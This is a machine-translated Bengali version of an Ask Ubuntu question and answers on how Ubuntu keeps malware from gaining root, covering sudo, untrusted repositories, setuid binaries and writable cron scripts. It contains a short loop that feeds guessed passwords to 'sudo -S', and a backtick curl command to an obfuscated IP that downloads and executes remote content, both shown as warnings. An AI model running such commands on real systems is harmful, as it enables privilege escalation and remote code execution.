কীভাবে সিস্টেমটি সুরক্ষিত রাখা হয়?


24

আমি বুঝতে পারি যে কোনও ম্যালওয়্যার যদি লিনাক্স সিস্টেমে প্রবেশ করে তবে এটি বেশিরভাগ ক্ষেত্রেই একটি ব্যবহারকারী-স্তরের অধিকার অর্জন করবে এবং নির্দিষ্ট ব্যবহারকারীর নাগালের মধ্যে যে কোনও কিছুই অর্থাৎ ব্যবহারকারীর নিজস্ব ফাইল নষ্ট করবে।

তবে ম্যালওয়্যারগুলিকে মূল-স্তরের অ্যাক্সেস পেতে ঠিক কী রাখে? এটি কি কোনওভাবে ভিতরে থেকে পাসওয়ার্ডটি ক্র্যাক করতে পারে না?


দুর্দান্ত প্রশ্নোত্তর!
NlightNFotis

উত্তর:


20

এটি একটি জটিল প্রশ্ন। উবুন্টু সিস্টেমে সুরক্ষার বিভিন্ন স্তর রয়েছে, অ্যাপআর্মার মতো জটিল ফ্রেমওয়ার্ক থেকে শুরু করে নম্র কার্নেল ভেরিয়েবলের মতো mmap_min_addr। আপনি মিশ্রণটিতে মেমরির র্যান্ডমাইজেশনের মতো কয়েকটি কার্নেল বৈশিষ্ট্য যুক্ত করতে পারেন। উবুন্টু উইকির একটি দ্রুত ব্যাখ্যা সহ আপনি তাদের একটি তালিকা পেতে পারেন ।

আর একটি গুরুত্বপূর্ণ বিষয় হ'ল আপডেটগুলি দ্রুত এবং সহজ উভয়ই - তাই বেশিরভাগ কম্পিউটারগুলি সর্বশেষ সুরক্ষা ফিক্সগুলিতে আপডেট হবে।

যতদূর আমি জানি, একজন আক্রমণকারী যে আপনার কম্পিউটারে স্থানীয় অ্যাক্সেস পেয়েছে তার কার্নেল সুবিধাগুলি স্কেল করার তিনটি উপায় রয়েছে:

  1. পাসওয়ার্ডটি ক্র্যাক করুন। তবে এটি সত্যিই কঠিন হতে চলেছে, পাসওয়ার্ডটি এনক্রিপ্ট করে সংরক্ষণ করা আছে, অজানা ত্রুটিযুক্ত অ্যালগরিদম ব্যবহার করে। এটি ক্র্যাক করতে যুগে যুগে সময় লাগবে।

  2. কার্নেলের মধ্যে বাগ। তবে কার্নেলের সমস্ত সুরক্ষা বৈশিষ্ট্যগুলি আসবে।

  3. পাসওয়ার্ড, সোশ্যাল ইঞ্জিনিয়ারিং দেওয়ার জন্য ব্যবহারকারীকে কৌশল করুন। কেবল একটি নকল পাসওয়ার্ড কথোপকথন দেখান বা অন্য কোনও কৌশল ব্যবহার করুন। এটি করার সহজ উপায় এটি।

তৃতীয় পয়েন্টটি এখনই সবচেয়ে দুর্বল দুর্বলতা।


5
নোট করুন যে এই "পাসওয়ার্ড" হ'ল সুডো-টু-রুট সুবিধাগুলি ব্যবহারকারীর পাসওয়ার্ড। মূল অ্যাকাউন্টটি ডিফল্টরূপে অক্ষম থাকে। # 3 আসলে ঘটে যাওয়া সবচেয়ে সম্ভাব্য জিনিস। অধিকন্তু, আপনি যদি অবিশ্বস্ত সংগ্রহস্থলগুলি ইনস্টল করেন, আপনি সেই সংগ্রহস্থলের জন্য ফ্রি রুট অ্যাকাউন্টগুলি হস্তান্তর করছেন।
লেকেনস্টেইন

@ লেকেনস্টেইন, কি ?! কীভাবে অবিশ্বাস্য সংস্থাগুলি যুক্ত করা হচ্ছে মূল অ্যাক্সেসের হাতছাড়া করে? যাইহোক, আপনি এটি একটি উত্তর হিসাবে পোস্ট করতে চাইতে পারেন, আমি এই থ্রেডটি একরকম সম্প্রদায়ের উইকি হতে চাই।
অক্সভিভি

সার্ভার প্রক্রিয়াগুলি ব্যতীত জিজ্ঞাসুবন্তুতে কোনও থ্রেড নেই। আপনি শুধুমাত্র একটি পোস্ট করেছেন মন্তব্য একটি থেকে উত্তর আপনার টু প্রশ্ন । আমি চিন্তার জন্য খাবারের সাথে একটি উত্তর যুক্ত করেছি।
লেকেনস্টেইন

@ অক্সভিবি আপনি যখন পিপিএ যুক্ত করেন এবং একটি প্যাকেজ ইনস্টল করেন, তখন প্যাকেজের প্রিনস্ট এবং পোস্ট-ইনস্টল স্ক্রিপ্ট থাকে যা তারা খুশি তাই করতে পারে। এটি রুট বা মেসের সাথে চালানোর জন্য কোনও পরিষেবা ইনস্টল করতে পারে sudoers
মনিকা পুনরায় ইনস্টল করুন - ζ--

15

রুট পাসওয়ার্ড নিজেই ক্র্যাক করা সম্ভব নয়, কারণ উবুন্টু ডিফল্টরূপে রুট ব্যবহারকারীকে অক্ষম করে। তবে, যদি আপনার ব্যবহারকারী সুডোর মাধ্যমে রুট হয়ে উঠতে পারে এবং আপনার পাসওয়ার্ডটি অনুমান করা / ব্রুট ফোর্স করা সহজ হয় তবে আপনি একটি অনিরাপদ সিস্টেম। উদাহরণস্বরূপ স্ক্রিপ্ট কিছু পাসওয়ার্ড পরীক্ষা করার চেষ্টা করছে:

#!/bin/sh
for pass in password 123 ubuntu pass; do
    echo $pass|sudo -S evil_command
done

একটি অবিশ্বস্ত সংগ্রহস্থল যুক্ত করার ফলে সেই সংগ্রহস্থল থেকে প্রোগ্রাম ইনস্টল করা যায়। এমনকি যদি আপনি স্পষ্টভাবে কোনও অ্যাপ্লিকেশন ইনস্টল না করেন তবে sudo apt-get install [app-from-repo], উবুন্টুকে বিশ্বাস করাতে যে সংগ্রহস্থলটি একটি নির্দিষ্ট প্রোগ্রামের একটি নতুন সংস্করণ রয়েছে তারপরেও সংগ্রহশালাটি অন্যান্য প্রোগ্রামগুলিকে প্রভাবিত করতে পারে।

আপডেট প্রক্রিয়াটি মূল হিসাবে চালিত হয়, অন্যথায় ফাইলগুলিতে /usr/binবা লেখা যায়নি /etc। একটি ইনস্টলেশন ট্রিগার রুট হিসাবে চালানো হয় এবং নির্বিচারে এবং সম্ভবত ক্ষতিকারক কমান্ড চালাতে পারে। এখন, উদ্বিগ্ন হবেন না, প্রোগ্রামগুলি আপডেট করার জন্য ম্যানুয়াল অ্যাকশন প্রয়োজন এবং উবুন্টু সংগ্রহস্থলগুলি নিরাপদ। উইন্ডোজের মতো বন্ধ-উত্স সফ্টওয়্যারটি কখনই পুরোপুরি বিশ্বাসযোগ্য হতে পারে না কারণ আপনি দূষিত কোডের উত্সটি পরীক্ষা করতে পারবেন না, তবে আপনার প্রয়োজন হলে উবুন্টু অ্যাপ্লিকেশনটির উত্সটি পর্যালোচনা করতে পারেন (যেমন sun-java6ফ্ল্যাশের মতো মালিকানাধীন প্রোগ্রামগুলিতে প্রয়োগ হয় না )।

জাভিয়ের রিভেরার উল্লেখ অনুসারে, কার্নেল বাগগুলি নির্বিচারে কোড কার্যকর করতে পারে, তবে বাগড সফ্টওয়্যার সম্ভবত বিপজ্জনক, বিশেষত বগি setsuidরুট বাইনারি (বাইনারি যা ফাইলের মালিকের অধীনে চলবে) এবং অন্যান্য বগি প্রোগ্রামগুলি রুট হিসাবে চলমান।

আপনি কী করছেন সেদিকে মনোযোগ না দিলে আপনি আপনার সিস্টেমে সুরক্ষা গর্ত তৈরি করতে পারেন। উদাহরণস্বরূপ, ক্রোনজবসের ধারণাটি পুরোপুরি না বুঝে আপনি একটি ক্রোনজ যুক্ত করেছেন /etc/cron.dailyযা আপনার বাড়ির ফোল্ডারে একটি প্রোগ্রাম চালায় (যেমন, /bin/sh /home/your-username/myscript.shযদি ম্যাসক্রিপ্ট.শ ফাইলটি আপনার দ্বারা মুছে ফেলা যায় তবে কোনও শোষণ দূষিত করে ফেলতে পারে কোড myscript.shযা মূল হিসাবে চালিত হবে (সুবিধাবদ্ধতা বৃদ্ধি)।

নিরাপদে থাকার জন্য, আপনার মন ব্যবহার করুন! অবিশ্বস্ত উত্স থেকে কমান্ডগুলি চালাবেন না যদি আপনি না জানেন তবে এটি কী করে। যদি কেউ বলে যে `curl 3221233674`ব্যাক-টিক দিয়ে চালাও, তবে করবেন না। 3221233674 হ'ল লেখার আরেকটি উপায় 192.0.32.10(উদাহরণ ডটকমের আইপি)। সুতরাং, এটি সমান হবে:

`curl http://example.com/`

এই ব্যাক-টিকগুলির ফলে আউটপুটটি শেল কমান্ড হিসাবে কার্যকর হয়। সরল ইংরেজিতে, "পৃষ্ঠাটি http://example.com/ ডাউনলোড করুন এবং ডাউনলোডকৃত পৃষ্ঠাটি কার্যকর করার চেষ্টা করুন"।

প্রথমে, আপনি প্রদত্ত কমান্ডটিতে দূষিত কিছু দেখতে পাবেন না। তবে এখন, আপনি জানেন যে এটিরও অপব্যবহার করা যেতে পারে।

ইন্টারনেটের মতো অবিশ্বস্ত উত্স থেকে আপনি সর্বদা কমান্ড / স্ক্রিপ্টটি পরীক্ষা করুন।


1
উত্তরের জন্য ধন্যবাদ, আমি আশা করি আপনি আমার সম্পাদনাগুলিতে কিছু মনে করেন না। আপনার ইংরেজি উন্নত করতে আমার সম্পাদনাগুলি নোট করুন।
অক্সভিভি

2
নাহ, আমি কিছু মনে করি না। প্রতিটি উন্নতি স্বাগত :)
লেকেনস্টেইন

নির্বিশেষে, এটি একটি দুর্দান্ত পোস্ট, আপনার উল্লেখ করা পয়েন্টগুলি অবশ্যই লক্ষণীয়!
অক্সভিভি
আমাদের সাইট ব্যবহার করে, আপনি স্বীকার করেছেন যে আপনি আমাদের কুকি নীতি এবং গোপনীয়তা নীতিটি পড়েছেন এবং বুঝতে পেরেছেন ।
Licensed under cc by-sa 3.0 with attribution required.